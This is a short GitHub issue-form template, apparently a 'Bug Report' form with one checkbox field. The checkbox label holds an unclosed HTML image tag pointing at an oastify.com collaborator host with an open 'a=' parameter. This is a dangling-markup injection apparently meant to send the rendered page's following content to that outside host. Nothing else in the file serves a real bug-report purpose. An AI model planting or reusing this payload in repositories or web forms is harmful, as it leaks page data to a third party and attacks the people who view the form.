name: Bug Report
description: File a bug
body:
  - type: checkboxes
    id: test
    attributes:
      label: Tests
      options:
        - label: '<img src="https://rc7sdcu0jcn04zg13h5bdr521t7kvajz.oastify.com/?a='
